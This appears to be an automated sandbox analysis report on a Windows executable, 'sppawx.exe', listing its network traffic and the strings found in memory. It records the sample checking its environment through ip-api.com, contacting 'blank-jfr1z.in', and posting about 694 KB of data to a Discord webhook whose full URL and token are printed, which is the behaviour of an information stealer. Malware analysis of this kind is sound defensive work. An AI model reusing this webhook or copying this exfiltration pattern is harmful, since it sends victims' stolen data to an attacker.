DMhttp://ns.adobe.com/xmp/1.0/DynamicMedia/Iptc4xmpCorehttp://iptc.org/std/Iptc4xmpCore/1.0/xmlns/MicrosoftPhotohttp://ns.microsoft.com/photo/1.0/MPhttp://ns.microsoft.com/photo/1.2/MPRIhttp://ns.microsoft.com/photo/1.2/t/RegionInfo#MPReghttp://ns.microsoft.com/photo/1.2/t/Region#rdfhttp://www.w3.org/1999/02/22-rdf-syntax-ns#dchttp://purl.org/dc/elements/1.1/xmphttp://ns.adobe.com/xap/1.0/xmpidqhttp://ns.adobe.com/xmp/Identifier/qual/1.0/xmpRightshttp://ns.adobe.com/xap/1.0/rights/xmpMMhttp://ns.adobe.com/xap/1.0/mm/xmpBJhttp://ns.adobe.com/xap/1.0/bj/xmpTPghttp://ns.adobe.com/xap/1.0/t/pg/pdfhttp://ns.adobe.com/pdf/1.3/photoshophttp://ns.adobe.com/photoshop/1.0/tiffhttp://ns.adobe.com/tiff/1.0/exifhttp://ns.adobe.com/exif/1.0/rrrstDimhttp://ns.adobe.com/xap/1.0/sType/Dimensions#xapGImghttp://ns.adobe.com/xap/1.0/g/img/stEvthttp://ns.adobe.com/xap/1.0/sType/ResourceEvent#stRefhttp://ns.adobe.com/xap/1.0/sType/ResourceRef#stVerhttp://ns.adobe.com/xap/1.0/sType/Version#stJobhttp://ns.adobe.com/xap/1.0/sType/Job#auxhttp://ns.adobe.com/exif/1.0/aux/crshttp://ns.adobe.com/camera-raw-settings/1.0/xmpDMhttp://ns.adobe.com/xmp/1.0/DynamicMedia/Iptc4xmpCorehttp://iptc.org/std/Iptc4xmpCore/1.0/xmlns/MicrosoftPhotohttp://ns.microsoft.com/photo/1.0/MPhttp://ns.microsoft.com/photo/1.2/MPRIhttp://ns.microsoft.com/photo/1.2/t/RegionInfo#MPReghttp://ns.microsoft.com/photo/1.2/t/Region#

Source: unknown	DNS query: name: ip-api.com
Source: unknown	DNS query: name: ip-api.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\sppawx.exe

Code function: 2_2_00007FFEDD276268 recv,

2_2_00007FFEDD276268

Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
Source: global traffic	HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3

Source: sppawx.exe, 00000002.00000002.1746242896.0000018C02074000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: sppawx.exe, 00000002.00000002.1746242896.0000018C02074000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: blank-jfr1z.in
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: discord.com

Source: unknown

HTTP traffic detected: POST /api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPsm1-wFNZP3qTm1buU6tOMG HTTP/1.1Host: discord.comAccept-Encoding: identityContent-Length: 694302User-Agent: python-urllib3/2.2.3Content-Type: multipart/form-data; boundary=4574e7a3c3bceb293e441457fd5f9388

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 07:38:40 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1734075521x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tx%2BJOy3W%2Fj6%2FZNhfBMrLuKCjk2aniXvX%2Bevuba68UlAfsef62gGbltAlNJ1TBi%2BhHRmPnZnM1fNgXqNAS3R2E6O%2FdyIWFAugz4daKez7DSO%2FfNDcG4xbQSJQ31%2Bl"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=7c9e703a624a385c05903c9da053e83e56587a9a-1734075520; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=kMelNpAhNdRlaZ1Uw0BI93eBNOmpVEH9iE4vc1SB4ww-1734075520206-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f144bba1e6742d7-EWR

Source: sppawx.exe, 00000000.00000003.1298063456.00000213D851F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digi
Source: sppawx.exe, 00000000.00000003.1298063456.00000213D851F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digi2
Source: sppawx.exe, 00000000.00000003.1298474849.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1297309607.00000213D851F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.co
Source: sppawx.exe, 00000000.00000003.1298474849.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1297309607.00000213D851F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.co2
Source: sppawx.exe, 00000000.00000003.1298474849.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299579157.00000213D852C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296348518.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295706195.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295934169.00000213D852C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296170103.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295317056.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1300038265.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299579157.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299731609.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296048416.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298173082.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295934169.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000002.1761232233.00000213D852C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1297309607.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295437976.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295181805.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295602402.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298063456.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: sppawx.exe, 00000000.00000003.1298474849.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296348518.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295706195.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296170103.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295317056.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1300038265.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299579157.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299731609.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296048416.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298173082.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295934169.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1297309607.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295437976.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295181805.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295602402.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298063456.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: sppawx.exe, 00000000.00000003.1298474849.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296348518.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295706195.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296170103.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295317056.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1300038265.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299579157.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299731609.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296048416.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298173082.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295934169.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1297309607.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295437976.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295181805.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295602402.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298063456.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: sppawx.exe, 00000000.00000003.1298474849.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299579157.00000213D852C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296348518.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295706195.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295934169.00000213D852C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296170103.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295317056.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1300038265.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299579157.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299731609.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296048416.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298173082.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295934169.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000002.1761232233.00000213D852C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1297309607.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295437976.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295181805.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295602402.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298063456.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: sppawx.exe, 00000002.00000003.1740170260.0000018C7F726000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1617193305.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1484130042.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1469818072.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1749404493.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1515784101.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1450803284.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1495682186.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1743024456.0000018C7F727000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1465225633.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
Source: sppawx.exe, 00000000.00000003.1299064923.00000213D851F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: sppawx.exe, 00000002.00000003.1744355401.0000018C7F7EB000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1740170260.0000018C7F726000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1617193305.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1484130042.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1740170260.0000018C7F7B7000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1469818072.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1749404493.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1515784101.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1450803284.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1743024456.0000018C7F7B7000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1739346668.0000018C7F833000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1747473298.0000018C7E7B1000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1748349929.0000018C7F296000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1749404493.0000018C7F7EC000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1495682186.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1743024456.0000018C7F727000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1465225633.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1749970875.0000018C7F833000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1429649617.000002724C8D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.1603530749.000001AF5478D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: sppawx.exe, 00000002.00000002.1748973373.0000018C7F726000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1740170260.0000018C7F726000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1744275263.0000018C7F726000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodx
Source: powershell.exe, 0000000B.00000002.1432087978.000002724CBE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mic
Source: sppawx.exe, 00000000.00000003.1299064923.00000213D851F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: sppawx.exe, 00000000.00000003.1299064923.00000213D851F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: sppawx.exe, 00000000.00000003.1298474849.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299579157.00000213D852C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296348518.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295706195.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295934169.00000213D852C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296170103.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295317056.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1300038265.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299579157.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299731609.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296048416.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298173082.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295934169.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000002.1761232233.00000213D852C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1297309607.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295437976.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295181805.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295602402.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298063456.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: sppawx.exe, 00000000.00000003.1298474849.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296348518.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295706195.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296170103.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295317056.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1300038265.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299579157.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299731609.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296048416.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298173082.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295934169.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1297309607.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295437976.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295181805.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295602402.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298063456.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: sppawx.exe, 00000000.00000003.1298474849.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296348518.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295706195.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296170103.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295317056.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1300038265.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299579157.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299731609.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296048416.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298173082.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295934169.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1297309607.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295437976.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295181805.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295602402.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298063456.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: _hashlib.pyd.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: sppawx.exe, 00000000.00000003.1298474849.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296348518.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295706195.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296170103.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295317056.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1300038265.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299579157.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299731609.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296048416.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298173082.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295934169.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1297309607.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295437976.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295181805.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295602402.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298063456.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: sppawx.exe, 00000000.00000003.1299064923.00000213D851F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: sppawx.exe, 00000002.00000003.1318997544.0000018C7F334000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1322409735.0000018C7F185000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1323907559.0000018C7F320000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
Source: sppawx.exe, 00000002.00000003.1451486952.0000018C7F704000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1748781914.0000018C7F698000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/
Source: sppawx.exe, 00000002.00000002.1748781914.0000018C7F698000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/mail/
Source: sppawx.exe, 00000002.00000002.1748349929.0000018C7F296000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/?fields=225545
Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 00000044.00000002.1605958223.000001AF5494D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.a.0/sTy
Source: powershell.exe, 00000044.00000002.1605958223.000001AF5494D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobe.c.0/ti
Source: powershell.exe, 00000044.00000002.1605958223.000001AF5494D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobe.hotosh
Source: powershell.exe, 00000044.00000002.1605958223.000001AF5494D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.adoraw-se
Source: powershell.exe, 00000044.00000002.1605958223.000001AF5494D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.photo/
Source: powershell.exe, 0000000B.00000002.1419951585.000002724448A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.1597118596.000001AF4C7D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.1539735870.000001AF3E1B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.1597118596.000001AF4C91B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: sppawx.exe, 00000000.00000003.1299064923.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1747473298.0000018C7E730000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
